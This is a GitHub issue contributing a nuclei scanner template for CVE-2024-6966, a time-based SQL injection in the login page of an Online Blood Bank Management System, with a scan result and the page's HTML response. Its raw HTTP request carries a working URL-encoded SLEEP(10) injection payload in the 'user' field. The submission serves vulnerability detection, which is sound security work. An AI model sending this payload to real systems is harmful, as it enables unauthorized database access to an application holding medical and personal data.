Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2024-6966 Online Blood Bank Management System - SQL Injection in Login Page #10393

Open
cl4irv0yance opened this issue Jul 25, 2024 · 1 comment
Open

CVE-2024-6966 Online Blood Bank Management System - SQL Injection in Login Page #10393

cl4irv0yance opened this issue Jul 25, 2024 · 1 comment
Assignees
@ritikchaddha
Labels
nuclei-template Nuclei template contribution

Comments

@cl4irv0yance
Copy link

Template Information:

In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection.

References can be found here:
https://nvd.nist.gov/vuln/detail/CVE-2024-6966
HermesCui/CVE#1

Nuclei Template:

id: cve-2024-6966

info:
  name: Itsourcecode Online Blood Bank Management System - Time Based SQL injection in Login Page
  author: cl4irv0yance
  description: In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection. 
  severity: High
  reference: 
    - https://github.com/HermesCui/CVE/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6966
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: cve-2024-6966
  tags: sqli,cve,cve-2024,cve-2024-6966,itsourcecode


http:
  - raw:
      - |
        @timeout: 25s
        POST /bloodbank/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        tab=on&user=tab%3Don%26user%3D123321%27+AND+%28SELECT+8755+FROM+%28SELECT%28SLEEP%2810%29%29%29xGkg%29+AND+%27emTj%27%3D%27emTj%26pass%3D123123%26sub%3DLog+In%22&pass=test&sub=Log+In

     matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Username'
          - 'Password'
          - 'Keep me Signed in'
          - 'Forgot Password'
          - 'Wrong email or password'
        condition: and

      - type: dsl
        dsl:
          - 'duration>=10'

Template Results

nuclei -u https://test.site/bloodbank -t cve-2024-6966.yaml                                                                   

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.9

                projectdiscovery.io

[INF] Current nuclei version: v3.2.9 (outdated)
[INF] Current nuclei-templates version: v9.9.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 75
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[cve-2024-6966] [http] [high] https://test.site/bloodbank/login.php

Page Response (only including html in response - snipped css)

HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 23:17:30 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 5588
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[..SNIP..]

<div class="login-wrap">
  <div class="login-html">

  <form action="" method="post">
    <input id="tab-1" type="radio" name="tab" class="sign-in" checked><label for="tab-1" class="tab">Login</label>
    <input id="tab-2" type="radio" name="tab" class="sign-up"><label for="tab-2" class="tab"></label>

            <div class="login-form">
      <div class="sign-in-htm">
        <div class="group">
          <form action="home.php">
          <label for="user" class="label">Username</label>
          <input id="user" type="text" class="input" name="user">
        </div>
        <div class="group">
          <label for="pass" class="label">Password</label>
          <input id="pass" type="password" class="input" data-type="password" name="pass">
        </div>
        <div class="group">
          <input id="check" type="checkbox" class="check" checked>
          <label for="check"><span class="icon"></span> Keep me Signed in</label>
        </div>
        <div class="group">
          <input type="submit" style="background-color: green; color: white" class="button" name="sub" value="Log In">
        </div>
          <div class="group">
            <a href="forgot.php">Forgot Password</a>


        

      <script>alert('Wrong email or password')</script>      	<div class="footer-left">
				<h3></span></h3>
				
             <div class="hr"></div>
        <div class="foot-lnk">
          <a href="forgot.html"></a>
        </div>
      </div>
@cl4irv0yance cl4irv0yance added the nuclei-template Nuclei template contribution label Jul 25, 2024
cl4irv0yance added a commit to cl4irv0yance/nuclei-templates that referenced this issue Jul 26, 2024
@cl4irv0yance
Added template for CVE-2024-6966, issue projectdiscovery#10393
a42805f
@cl4irv0yance cl4irv0yance mentioned this issue Jul 26, 2024
Open
1 task
@princechaddha
Copy link
Member

Hello, the response time for this issue was longer than usual because the team was traveling for DEFCON. The team will respond to this issue shortly. Thank you for your contribution

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@ritikchaddha ritikchaddha

Labels
nuclei-template Nuclei template contribution
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@princechaddha @ritikchaddha @cl4irv0yance @pussycat0x